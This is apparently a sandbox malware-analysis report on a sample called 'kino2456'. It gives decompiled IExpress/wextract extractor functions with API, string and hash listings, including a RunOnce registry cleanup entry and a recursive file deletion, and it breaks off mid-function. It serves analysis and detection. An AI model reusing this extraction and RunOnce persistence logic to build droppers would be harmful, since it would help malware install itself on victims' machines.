Opcode Fuzzy Hash: 7f57f33b5dfb5fe68e0d8d4a996a4fe7625f277d52c20ca90b21327a20f7357e
Instruction Fuzzy Hash: 22A14F70D0021A5BEB209B24CE47FE67769BB43320F14429CE555E32C3DB749DA9EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00FC2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t9 ^ _t46;
				if( *0xfc8a38 != 0) {
					L5:
					_t11 = E00FC5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00FC6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E00FC55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00FC658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xfca288("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xfc8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xfc8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xfc8d48 & 0x000000c0;
									if(( *0xfc8d48 & 0x000000c0) == 0) {
										_t41 =  *0xfc9a40; // 0x3, executed
										_t26 = E00FC256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xfc8a24; // 0x0
									 *0xfc9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xfc8a38;
										if( *0xfc8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00FC4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xfc9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00FC3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xfc8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00FC3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00FC44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xfc9124 = E00FC6285();
							goto L16;
						}
						_t59 =  *0xfc9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00FC621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xfc8a24;
				if( *0xfc8a24 != 0) {
					L4:
					_t34 = E00FC3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00FC51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xfc8a38;
				if( *0xfc8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00fc2f1d
0x00fc2f28
0x00fc2f2f
0x00fc2f3d
0x00fc2f6c
0x00fc2f6c
0x00fc2f71
0x00fc2f73
0x00fc3041
0x00fc3041
0x00fc3043
0x00fc3053
0x00fc3053
0x00fc2f79
0x00fc2f80
0x00000000
0x00fc2f86
0x00fc2f86
0x00fc2f93
0x00fc2f9e
0x00fc2fa0
0x00fc2fa6
0x00fc2fb8
0x00fc2fba
0x00fc2fbe
0x00fc2fc6
0x00fc2fcc
0x00fc2fd4
0x00fc2fd6
0x00fc2fd8
0x00fc2fe0
0x00fc2fe6
0x00fc2fee
0x00fc2ff0
0x00fc2ff5
0x00fc2ff5
0x00fc2fee
0x00fc2fd4
0x00fc2ff8
0x00fc2ffe
0x00fc3004
0x00fc3017
0x00fc301c
0x00fc3024
0x00fc3054
0x00fc305a
0x00fc3065
0x00fc3065
0x00fc306c
0x00fc306e
0x00fc3075
0x00fc307a
0x00fc307a
0x00fc307c
0x00fc3081
0x00fc3087
0x00fc3089
0x00fc30a1
0x00fc30a1
0x00fc30a9
0x00fc30ab
0x00fc30ad
0x00fc30af
0x00fc30af
0x00fc30ad
0x00fc30b6
0x00000000
0x00fc308b
0x00fc308b
0x00fc3091
0x00000000
0x00000000
0x00fc3093
0x00fc3098
0x00fc309a
0x00000000
0x00000000
0x00fc309c
0x00000000
0x00fc309c
0x00fc3089
0x00fc305c
0x00fc3061
0x00fc3063
0x00000000
0x00000000
0x00000000
0x00fc3063
0x00fc302b
0x00fc3032
0x00fc303c
0x00000000
0x00fc303c
0x00fc3006
0x00fc300c
0x00000000
0x00000000
0x00fc300e
0x00fc3015
0x00000000
0x00000000
0x00000000
0x00fc3015
0x00fc2f80
0x00fc2f3f
0x00fc2f46
0x00fc2f5f
0x00fc2f5f
0x00fc2f64
0x00fc2f66
0x00000000
0x00000000
0x00000000
0x00fc2f66
0x00fc2f4f
0x00000000
0x00000000
0x00fc2f55
0x00fc2f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00FC2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00FC2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00FC2FC6
DecryptFileA.ADVAPI32 ref: 00FC2FE6
FreeLibrary.KERNEL32(00000000), ref: 00FC2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00FC301C

Part of subcall function 00FC51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FC2F4D,?,00000002,00000000), ref: 00FC5201

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC2FDB, 00FC3017
advapi32.dll, xrefs: 00FC2F99
DecryptFileA, xrefs: 00FC2FC0

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-2099937843
Opcode ID: 05943c55c28be5d0696fbceb62f04dc7f89c7609e9e96febd1692cbeaee7b949
Instruction ID: d003c8278a3c3a33db05553584631f0b9ebf12965aafed728a3cc7c04594ec93
Opcode Fuzzy Hash: 05943c55c28be5d0696fbceb62f04dc7f89c7609e9e96febd1692cbeaee7b949
Instruction Fuzzy Hash: 9641B932E4021F9ADB30AB719F4BF5633A8EB447E8F04406DA941C3192EB78DE81F651

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00FC2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xfc8004; // 0xd6d6fca6
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00FC6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00FC1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E00FC16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00FC1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00FC16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00FC16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E00FC658A( &_v280, 0x104, 0xfc1140);
								E00FC2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00fc2398
0x00fc239e
0x00fc23a3
0x00fc23a5
0x00fc23ae
0x00fc23b3
0x00fc24cb
0x00fc24d2
0x00fc24d3
0x00fc24d4
0x00fc24df
0x00fc23c2
0x00fc23d1
0x00fc23db
0x00fc23e4
0x00fc23f6
0x00fc23fc
0x00fc2401
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc2407
0x00fc2407
0x00fc2408
0x00fc2411
0x00fc241f
0x00fc247a
0x00fc2483
0x00fc2495
0x00fc24a3
0x00fc2421
0x00fc242f
0x00fc2453
0x00fc245d
0x00fc2466
0x00fc2472
0x00fc2472
0x00fc242f
0x00fc24af
0x00fc24b5
0x00fc24be
0x00fc24c5
0x00000000
0x00fc24c5

APIs

FindFirstFileA.KERNELBASE(?,00FC8A3A,00FC11F4,00FC8A3A,00000000,?,?), ref: 00FC23F6
lstrcmpA.KERNEL32(?,00FC11F8), ref: 00FC2427
lstrcmpA.KERNEL32(?,00FC11FC), ref: 00FC243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00FC2495
DeleteFileA.KERNEL32(?), ref: 00FC24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00FC24AF
FindClose.KERNELBASE(00000000), ref: 00FC24BE
RemoveDirectoryA.KERNELBASE(00FC8A3A), ref: 00FC24C5

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 451b1f8cdf6bf44e22c123f75dea1a5395316d9bd52acefda2b550a379b3ea43
Instruction ID: 29e44ada0c5e84d54cde495916d07ba5fdcca7f19bb73de6a64c0979dfa27012
Opcode Fuzzy Hash: 451b1f8cdf6bf44e22c123f75dea1a5395316d9bd52acefda2b550a379b3ea43
Instruction Fuzzy Hash: E931D4326046499BC320DB64CE4BFEB73ACFBC5315F04492DB55583191EB38A80DE752

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00FC2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0xfca288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0xfc9124 = 0;
				if(E00FC2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00FC2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E00FC52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0xfc8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0xfc9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00FC1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0xfc8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xfc9124; // 0x80070002
				return _t7;
			}

0x00fc2c03
0x00fc2c0d
0x00fc2c18
0x00fc2c20
0x00fc2c2e
0x00fc2c32
0x00fc2c36
0x00fc2c3d
0x00fc2c43
0x00fc2c45
0x00fc2c47
0x00fc2c49
0x00fc2c4e
0x00fc2c4e
0x00fc2c47
0x00fc2c32
0x00fc2c20
0x00fc2c50
0x00fc2c54
0x00fc2c57
0x00fc2c64
0x00fc2c66
0x00fc2c6b
0x00fc2c6d
0x00fc2c74
0x00fc2c76
0x00fc2c7c
0x00fc2c7e
0x00fc2c87
0x00fc2c89
0x00fc2c89
0x00fc2c87
0x00fc2c7c
0x00fc2c74
0x00fc2c8e
0x00fc2c95
0x00fc2c98
0x00fc2c98
0x00fc2c9e
0x00fc2ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00FC6BB0,00FC0000,00000000,00000002,0000000A), ref: 00FC2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00FC6BB0,00FC0000,00000000,00000002,0000000A), ref: 00FC2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00FC2C28
CloseHandle.KERNEL32(00000000,?,?,00FC6BB0,00FC0000,00000000,00000002,0000000A), ref: 00FC2C98

Strings

HeapSetInformation, xrefs: 00FC2C22
Kernel32.dll, xrefs: 00FC2C13

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 8b4f08eb0e3fdc249cf0701a7618e859735d1955762ee54d33bd88c6716c65f6
Instruction ID: 10a472875669bc62ff9ca06ff5e113136c99a2710a2ee23f9ebf1a26b7d2040b
Opcode Fuzzy Hash: 8b4f08eb0e3fdc249cf0701a7618e859735d1955762ee54d33bd88c6716c65f6
Instruction Fuzzy Hash: 8911E071A0020F6BC760ABB5AF8BF6E3759EB843B4B08002DB801D7251CE35EC05B661

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC6F40() {

				SetUnhandledExceptionFilter(E00FC6EF0); // executed
				return 0;
			}

0x00fc6f45
0x00fc6f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00FC6F45

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5ed493a7cd65ff59b536e6bfa2c885e6e289a8d7c9ad722cb8fe4bb0df8467e8
Instruction ID: 09e99174a2c9a802a29fa498697928102a49bd5bd800cc2a6a24e146739d04fd
Opcode Fuzzy Hash: 5ed493a7cd65ff59b536e6bfa2c885e6e289a8d7c9ad722cb8fe4bb0df8467e8
Instruction Fuzzy Hash: 3F9002742551094797101B709F1BD1576915B4D606B865465A011C5495DB6090407917

Uniqueness

Uniqueness Score: -1.00%

Function 00FC202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00FC202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00FC6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00FC171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00FC658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xfc9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xfc91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xfc91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xfc91e5);
						if(_t90 != 0) {
							 *0xfc8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
							E00FC171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00FC44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00FC658A( &_v268, 0x104, 0xfc1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0xfc8530 = _t66;
				goto L23;
			}

0x00fc202a
0x00fc2035
0x00fc203c
0x00fc2041
0x00fc2050
0x00fc205f
0x00fc2064
0x00fc206f
0x00fc208c
0x00fc2094
0x00fc2257
0x00fc2266
0x00fc2266
0x00fc209a
0x00fc209b
0x00fc209d
0x00fc20aa
0x00fc20af
0x00fc20c9
0x00fc20d1
0x00000000
0x00000000
0x00fc20d3
0x00fc20da
0x00000000
0x00000000
0x00000000
0x00fc20da
0x00fc20e2
0x00fc2103
0x00fc210e
0x00fc2116
0x00fc2122
0x00fc2128
0x00fc212c
0x00fc2179
0x00fc2194
0x00fc21de
0x00fc21e4
0x00fc2256
0x00fc2256
0x00000000
0x00fc2256
0x00fc2196
0x00fc2196
0x00fc219c
0x00fc219f
0x00fc219f
0x00fc21a1
0x00fc21a2
0x00fc21a6
0x00fc21a8
0x00fc21b0
0x00fc21b0
0x00fc21b2
0x00fc21b3
0x00fc21bc
0x00fc21c7
0x00fc21cb
0x00fc21f1
0x00fc21f6
0x00fc21fd
0x00fc21ff
0x00fc21ff
0x00fc2204
0x00fc2213
0x00fc2218
0x00fc221d
0x00fc221d
0x00fc2220
0x00fc2220
0x00fc2222
0x00fc2223
0x00fc2229
0x00fc223d
0x00fc2249
0x00fc2250
0x00000000
0x00fc2250
0x00fc21d2
0x00fc21d9
0x00000000
0x00fc21d9
0x00fc213a
0x00fc2141
0x00fc2144
0x00fc214c
0x00000000
0x00000000
0x00fc2163
0x00fc2172
0x00fc2172
0x00000000
0x00fc2163
0x00fc20ea
0x00fc20f0
0x00000000

APIs

memset.MSVCRT ref: 00FC2050
memset.MSVCRT ref: 00FC205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00FC208C

Part of subcall function 00FC171E: _vsnprintf.MSVCRT ref: 00FC1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC20EA
GetSystemDirectoryA.KERNEL32 ref: 00FC2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00FC2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC2144
GetSystemDirectoryA.KERNEL32 ref: 00FC215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00FC223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FC2250

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00FC2082
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC21A8, 00FC2204
wextract_cleanup%d, xrefs: 00FC209E
wextract_cleanup2, xrefs: 00FC20A5, 00FC20BE, 00FC20F0, 00FC2232
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00FC21F6
DelNodeRunDLL32, xrefs: 00FC212E
advpack.dll, xrefs: 00FC2109
%s /D:%s, xrefs: 00FC21FF, 00FC2210

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
API String ID: 178549006-2699677747
Opcode ID: 579fa16e839e37b025fd06a79f1e413dbf742e8ef96f0a8b696f420fcb305d92
Instruction ID: ddd46033357a309adcf641b3db84aab1deb826ab1d5483fa82ca2266e9fbb0db
Opcode Fuzzy Hash: 579fa16e839e37b025fd06a79f1e413dbf742e8ef96f0a8b696f420fcb305d92
Instruction Fuzzy Hash: AE510671A4021EABDB209F20DE4FFEB772CEF44754F0401ACFA49E7151DA749D49AA60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00FC55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t28 ^ _t110;
				_t2 = E00FC468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00FC468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xfc9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xfc8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xfc8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00FC6517(_t82, 0x7d2, 0, E00FC3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
